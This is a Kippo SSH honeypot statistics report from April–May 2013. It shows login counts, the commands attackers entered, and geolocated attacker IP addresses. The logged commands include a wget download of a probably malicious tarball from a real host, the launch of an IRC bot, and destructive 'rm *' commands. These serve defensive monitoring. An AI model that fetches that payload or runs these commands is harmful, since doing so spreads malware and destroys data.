SSH Honeypot statistics 11-05-2013

Source website: bruteforce.gr/kippo-graph

Overall honeypot activity

Total login attempts 22343

Distinct source IP addresses 138

Active time period

Start date (first attack) End date (last attack)

Tuesday, 09-Apr-2013, 20:22 PM Saturday, 11-May-2013, 10:29 AM

Graphical statistics generated from your Kippo honeypot database

Top 10 passwordsThis vertical bar chart diplays the top 10passwords that attackers try when attackingthe system.

Top 10 usernamesThis vertical bar chart diplays the top 10usernames that attackers try when attackingthe system.

Top 10 user-pass combosThis vertical bar chart diplays the top 10username and password combinations thatattackers try when attacking the system.

http://bruteforce.gr/kippo-graph

This pie chart diplays the top 10 username andpassword combinations that attackers trywhen attacking the system.

Success ratioThis vertical bar chart diplays the overallattack success ratio for the particular honeypotsystem.

Successes per day/weekThis vertical bar chart diplays the mostsuccessful break-ins per day (Top 20) for theparticular honeypot system. The numbersindicate how many times correct credentialswere given by attackers.

This line chart diplays the daily successes onthe honeypot system. Spikes indicatesuccessful entries over a weekly period.

Warning: Dates with zero successes are notdisplayed.

This line chart diplays the weekly successes onthe honeypot system. Curves indicatesuccessful entries over a weekly period.

Connections per IPThis vertical bar chart diplays the top 10unique IPs ordered by the number of overallconnections to the system.

This pie chart diplays the top 10 unique IPsordered by the number of overall connectionsto the system.

Successful logins from thesame IPThis vertical bar chart diplays the number ofsuccessful logins from the same IP address(Top 20). The numbers indicate how manytimes the particular source opened a successfulsession.

Probes per day/weekThis horizontal bar chart diplays the mostprobes per day (Top 20) against the honeypotsystem.

This line chart diplays the daily activity on thehoneypot system. Spikes indicate hackingattempts.

Warning: Dates with zero probes are notdisplayed.

This line chart diplays the weekly activity onthe honeypot system. Curves indicate hackingattempts over a weekly period.

Top 10 SSH clientsThis vertical bar chart diplays the top 10 SSHclients used by attackers during their hackingattempts.

Copyright © 2011, 2012 - All Rights Reserved - Kippo-Graph Thanks to OS Templates


http://www.os-templates.com/


Input presentation and statistics gathered from the honeypot system

Overall post-compromise activity

Post-compromise human activity

Total number of commands Distinct number of commands

122 72

Downloaded files

Total number of downloads Distinct number of downloads

1 1

Human activity inside the honeypotThe following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.

The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation. Warning: Dates with zero input are not displayed.

The following line chart visualizes real human activity per week, by counting the number of input to the system for each day of operation.


Top 10 input (overall)The following table diplays the top 10 commands (overall) entered by attackers in the honeypot system.

ID Input Count

1 ls 20

2 exit 7

3 cd .. 7

4 ls -a 3

5 poweroff -h 3

6 poweroff 3

7 top 3

8 ls -l 3

9 test 2

10 w 2

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.

Top 10 successful inputThe following table diplays the top 10 successful commands entered by attackers in the honeypot system.

ID Input (success) Count

1 ls 20

2 exit 7

3 cd .. 7

4 ls -a 3

5 ls -l 3

6 w 2

7 mkdir TEST 2

8 rm * 2

9 rmdir * 2

10 logout 2

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.

Top 10 failed inputThe following table diplays the top 10 failed commands entered by attackers in the honeypot system.

ID Input (fail) Count

1 poweroff -h 3

2 poweroff 3

3 top 3

4 help 2

5 sudo rmdir * 2

6 test 1

7 halt -h 1

8 halt -n 1

9 halt 1

10 ? 1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.

passwd commandsThe following table diplays the latest "passwd" commands entered by attackers in the honeypot system.

ID Timestamp Input

1 Wednesday, 24-Apr-2013, 09:11 AM tst

2 Wednesday, 24-Apr-2013, 09:11 AM test

wget commandsThe following table diplays the latest "wget" commands entered by attackers in the honeypot system.

ID Input File link NoVirusThanks

1 wget rom.do.am/enou.tgz http://anonym.to/?http://rom.do.am/enou.tgz Scan File

Executed scriptsThe following table diplays the latest executed scripts by attackers in the honeypot system.

ID Timestamp Input

1 Monday, 06-May-2013, 17:06 PM ./eggdrop-1.6.17 -m bot1.conf

Interesting commandsThe following table diplays other interesting commands executed by attackers in the honeypot system.

ID Timestamp Input

1 Monday, 06-May-2013, 17:06 PM cat /proc/cpuinfo

2 Wednesday, 01-May-2013, 12:16 PM cat /etc/issue

3 Wednesday, 24-Apr-2013, 20:26 PM ifconfig


http://anonym.to/?http://rom.do.am/enou.tgz

http://vscan.novirusthanks.org/?url=http://rom.do.am/enou.tgz&submiturl=http://rom.do.am/enou.tgz




Geolocation information gathered from the IP addresses probing the Kippo SSH Honeypot

The following table displays the top 10 IP addresses connected to the system (ordered by volume of connections).

ID IP Address Probes City Region CountryName Code Latitude Longitude Hostname Lookup

1 93.63.201.220 5258 Rome Latium Italy IT 41.900002 12.4833 smtp.sinfarma.it

2 103.23.100.173 4268 Indonesia ID -5 120 173.subnet-103.23.100.host.unnes.ac.id

3 69.28.57.87 4021 RowlandHeights

CA UnitedStates

US 33.978199 -117.903999 69.28.57.87

4 37.140.248.6 1136 Jordan JO 31 36 37.140.248.6

5 117.135.241.112 840 Beijing Beijing China CN 39.928902 116.388298 117.135.241.112

6 1.25.202.50 573 Baotou NeiMongol

China CN 40.652199 109.822197 1.25.202.50

7 190.0.17.43 484 Antioquia Colombia CO 6.2518 -75.563599 Wimax-Cali-190-0-17-43.orbitel.net.co

8 60.191.220.106 457 China CN 35 105 60.191.220.106

9 5.178.87.121 422 RussianFederation

RU 60 100 5.178.87.121

10 202.102.111.179 383 Nanjing Jiangsu China CN 32.061699 118.777802 202.102.111.179

11 173.208.210.111 317 Kansas City MO UnitedStates

US 39.1068 -94.566002 173.208.210.111

12 218.237.65.47 284 Seocho Seoul Korea,Republic of

KR 37.490601 127.019997 218.237.65.47

13 108.174.151.58 275 Denver CO UnitedStates

US 39.705502 -104.9664 108-174-151-58.worldwidewebhosting.com

14 58.225.75.228 262 Seoul Seoul Korea,Republic of

KR 37.598499 126.978302 58.225.75.228

15 37.153.99.247 262 Netherlands NL 52.5 5.75 37.153.99.247

16 79.172.10.78 257 Yekaterinburg Sverdlovsk RussianFederation

RU 56.851898 60.612202 79.172.10.78.ural.ru


http://www.robtex.com/ip/93.63.201.220.html
















Federation

17 220.161.148.178 218 Putian Fujian China CN 24.987801 118.498299 220.161.148.178

18 42.121.56.31 165 Hangzhou Zhejiang China CN 30.2936 120.1614 42.121.56.31

19 88.190.44.131 147 Paris Île-de-France

France FR 48.866699 2.3333 88-190-44-131.rev.dedibox.fr

20 92.86.121.113 128 Bucharest Bucureşti Romania RO 44.4333 26.1 adsl92-86-121-113.romtelecom.net

21 62.193.248.117 122 Amen Provence-Alpes-Côted'Azur

France FR 44.048302 6.8698 wpc4027.amenworld.com

22 173.44.236.68 97 Henderson NV UnitedStates

US 36.0312 -115.073898 173.44.236.68

23 121.254.224.145 96 Seoul Seoul Korea,Republic of

KR 37.598499 126.978302 121.254.224.145


RU 60 100 1056.globatel.ru

25 61.156.238.56 88 Jinan Shandong China CN 36.668301 116.9972 61.156.238.56


27 1.255.3.116 77 Australia AU -27 133 1.255.3.116

28 60.10.203.18 72 Hebei Hebei China CN 39.889702 115.275002 60.10.203.18



31 37.247.104.243 60 Sanayi AntalyaProvince

Turkey TR 36.903099 30.6991 host-37-247-104-243.routergate.com


33 96.45.168.34 58 CanyonCountry

CA UnitedStates

US 34.406502 -118.401497 34.168.45.96-dedicated.multacom.com





















35 220.128.241.128 52 T'ai-wan Taiwan TW 24.9869 121.305603 vcs.mediland.com.tw

36 124.92.127.194 51 Shenyang LiaoningProvince

China CN 41.792198 123.4328 124.92.127.194

37 58.248.38.108 50 Guangzhou Guangdong China CN 23.116699 113.25 58.248.38.108

38 202.136.60.142 48 China CN 35 105 202.136.60.142

39 202.85.213.179 42 China CN 35 105 202.85.213.179

40 46.21.161.37 41 Netherlands NL 52.5 5.75 no-record-set.rijndata.nl


42 221.176.185.229 37 Xinyang Henan China CN 32.095798 114.1203 221.176.185.229

43 200.222.101.118 37 Brazil BR -10 -55 mailz.riodasostras.rj.gov.br

44 202.100.221.46 36 Haikou HainanProvince

China CN 20.045799 110.341698 202.100.221.46

45 189.3.61.50 36 Caxias Maranhão Brazil BR -4.8333 -43.349998 189.3.61.50


47 218.200.177.234 33 Chengdu Sichuan China CN 30.6667 104.066704 218.200.177.234


49 94.242.252.47 31 Luxembourg LU 49.75 6.1667 ip-static-94-242-252-47.as5577.net

50 77.221.104.75 27 Jeddah Makkah SaudiArabia

SA 21.516899 39.2192 77.221.104.75

51 177.135.154.60 26 São Paulo Brazil BR -23.473301 -46.665798 multiplusfidelidade.static.gvt.net.br

52 70.183.21.153 26 Santa Ana CA UnitedStates

US 33.745399 -117.891998 wsip-70-183-21-153.oc.oc.cox.net





















54 202.103.36.43 24 Wuhan Hubei China CN 30.580099 114.273399 202.103.36.43

55 94.141.130.162 24 Bydgoszcz Kujawsko-PomorskieVoivodship

Poland PL 53.127102 18.02 162-host.alfa.pl


57 47.21.145.210 23 UnitedStates

US 38 -97 ool-2f1591d2.static.optonline.net

58 113.57.238.30 22 Wuhan Hubei China CN 30.580099 114.273399 113.57.arpa.hb.cnc.cn

59 219.148.203.133 21 Shenyang LiaoningProvince

China CN 41.792198 123.4328 219.148.203.133


61 109.70.149.222 19 UnitedKingdom

GB 51.5 -0.13 222-149-109.gamingdeluxe.co.uk

62 209.92.176.41 18 Allentown PA UnitedStates

US 40.6152 -75.543701 reverse.in-addr.arpa

63 119.36.186.44 18 Wuhan Hubei China CN 30.580099 114.273399 119.36.arpa.hb.cnc.cn

64 81.23.20.8 15 Kiev MistoKyyiv

Ukraine UA 50.4333 30.516701 81-23-20-8-vpn.gprs.kyivstar.net

65 203.34.37.37 15 Mongolia MN 46 105 203.34.37.37

66 174.142.53.50 15 Montreal QC Canada CA 45.5 -73.583298 mail.rayara.com


68 145.253.72.3 13 Germany DE 51 9 145.253.72.3


70 59.175.148.95 11 Wuhan Hubei China CN 30.580099 114.273399 95.148.175.59.broad.wh.hb.dynamic.163data.com.cn




















71 221.224.33.70 11 Suzhou Jiangsu China CN 31.3041 120.595398 221.224.33.70



74 196.41.208.194 9 Springs Gauteng South Africa ZA -26.25 28.4 mail.pdna.co.za


76 61.142.106.34 8 Zhongshan Guangdong China CN 21.322599 110.582901 61.142.106.34

77 220.248.83.20 8 Shanghai Shanghai China CN 31.045601 121.399696 220.248.83.20

78 67.205.68.105 8 Montreal QC Canada CA 45.5 -73.583298 67.205.68.105

79 50.57.144.86 8 San Antonio TX UnitedStates

US 29.488899 -98.398697 50-57-144-86.static.cloud-ips.com

80 123.30.173.96 8 Ho Chi MinhCity

Hồ ChíMinh

Vietnam VN 10.8142 106.643799 static.vdc.vn

81 189.26.255.11 7 Salvador Bahia Brazil BR -12.9833 -38.516701 189.26.255.11.static.gvt.net.br

82 60.220.225.214 6 Changzhi Shanxi China CN 36.045799 113.044197 214.225.220.60.adsl-pool.sx.cn

83 50.115.166.46 6 Kansas City MO UnitedStates

US 39.1068 -94.566002 50.115.166.46

84 94.142.155.123 6 Iceland IS 65 -18 94.142.155.123

85 203.231.233.18 5 Korea,Republic of

KR 37 127.5 203.231.233.18

86 62.217.127.90 5 Greece GR 39 22 helpdesk.vm.aspete.gr

87 185.19.93.203 4 Sanayi AntalyaProvince

Turkey TR 36.903099 30.6991 host-185-19-93-203.ttnetdc.com


89 221.192.143.73 4 Hebei Hebei China CN 39.889702 115.275002 221.192.143.73




















90 219.138.203.198 4 Ezhou Hubei China CN 30.396099 114.886497 219.138.203.198



93 204.185.46.18 3 Columbia MO UnitedStates

US 38.881699 -92.402 204.185.46.18



96 2.238.127.234 3 Valenza Piedmont Italy IT 45.016701 8.6333 2-238-127-234.ip244.fastwebnet.it

97 77.251.217.15 3 Weesp NorthHolland

Netherlands NL 52.307701 5.0397 dhcp-077-251-217-015.chello.nl


99 182.118.23.141 2 Zhengzhou Henan China CN 34.683601 113.532501 hn.kd.ny.adsl

100 152.104.213.5 2 Hong Kong HK 22.25 114.166702 static-ip-5-213-104-152.anlai.com

101 61.164.147.2 2 China CN 35 105 61.164.147.2



104 219.144.17.74 2 Xian Shaanxi China CN 34.258301 108.928596 219.144.17.74

105 117.21.182.50 2 Nanchang Jiangxi China CN 28.549999 115.933296 117.21.182.50


107 69.172.215.246 2 Los Angeles CA UnitedStates

US 34.0522 -118.243698 69.172.215.246




















States

108 188.225.190.57 2 PalestinianTerritory

PS 32 35.25 188.225.190.57

109 218.104.145.140 2 China CN 35 105 218.104.145.140

110 71.248.125.231 2 Towson MD UnitedStates

US 39.402 -76.632896 static-71-248-125-231.bltmmd.east.verizon.net

111 103.23.125.25 2 India IN 20 77 103.23.125.25

112 69.39.136.12 1 Indianapolis IN UnitedStates

US 39.768398 -86.157997 12.136.39.69.static.egix.net

113 82.137.15.47 1 Bucharest Bucureşti Romania RO 44.4333 26.1 82-137-15-47.rdsnet.ro

114 79.114.226.20 1 Satu Mare Satu Mare Romania RO 47.799999 22.883301 79-114-226-20.rdsnet.ro

115 218.59.215.185 1 Jinan Shandong China CN 36.668301 116.9972 218.59.215.185

116 5.39.89.200 1 France FR 46 2 ks3276722.kimsufi.com

117 137.117.13.65 1 UnitedStates

US 38 -97 137.117.13.65

118 37.182.85.128 1 Italy IT 42.833302 12.8333 37.182.85.128

119 80.115.223.60 1 Saratov Saratov RussianFederation

RU 51.5406 46.008598 oxota.ws


RU 60 100 g-kondi.sc.ru

121 91.193.121.90 1 Poland PL 52 20 91.193.121.90

122 198.211.116.18 1 New York NY UnitedStates

US 40.7267 -73.9981 198.211.116.18

123 211.142.247.67 1 Xiangtan HunanProvince

China CN 28.6411 111.7789 211.142.247.67


125 174.34.145.74 1 Seattle WA UnitedStates

US 47.489101 -122.290802 174.34.145.74.rdns.ubiquity.io




















126 198.148.101.62 1 CanyonCountry

CA UnitedStates

US 34.406502 -118.401497 62-101-148-198-dedicated.multacom.com

127 46.102.12.148 1 Ploiesti Prahova Romania RO 44.950001 26.016701 46.102.12.148

128 182.131.22.211 1 Chengdu Sichuan China CN 30.6667 104.066704 182.131.22.211

129 79.114.235.54 1 Satu Mare Satu Mare Romania RO 47.799999 22.883301 79-114-235-54.rdsnet.ro

130 211.142.247.66 1 Xiangtan HunanProvince

China CN 28.6411 111.7789 211.142.247.66

131 122.165.87.196 1 Chennai TamilNādu

India IN 13.0833 80.283302 ABTS-TN-Static-196.87.165.122.airtelbroadband.in

132 189.211.50.117 1 Mexico TheFederalDistrict

Mexico MX 19.4342 -99.138603 189-211-50-117.static.axtel.net

133 110.75.188.37 1 Hangzhou Zhejiang China CN 30.2936 120.1614 UNKNOWN-110-75-188-37.aliyun.com

134 88.191.160.75 1 Paris Île-de-France

France FR 48.866699 2.3333 88-191-160-75.rev.dedibox.fr

135 54.251.223.249 1 Singapore SG 1.3667 103.800003 ec2-54-251-223-249.ap-southeast-1.compute.amazonaws.com

136 76.74.129.236 1 Canada CA 60 -95 76.74.129.236

137 61.100.186.34 1 Korea,Republic of

KR 37 127.5 61.100.186.34


139 79.113.138.233 1 Focsani Vrancea Romania RO 45.700001 27.1833 79-113-138-233.rdsnet.ro

140 186.46.93.75 1 Quito Pichincha Ecuador EC -0.2167 -78.5 186.46.93.75

The following zoomable world map marks the geographic locations of the top 10 IPs according to their latitude and longitude values. Click on them to get the full informationavailable from the database.

















The following Intensity Map shows the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.

1 5262

The following pie chart visualizes the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.

Geolocation by geoPlugin

Map data ©2013 MapLink Imagery ©2013 NASA, TerraMetrics

http://www.geoplugin.com/

http://maps.google.com/maps?ll=19.593357,8.30415&z=2&t=h&hl=en-US




Date post:	24-Mar-2016
Category:	Documents
Upload:	christiaan-008
View:	229 times
Download:	13 times

SSH Honeypot statistics 11-05-2013

Documents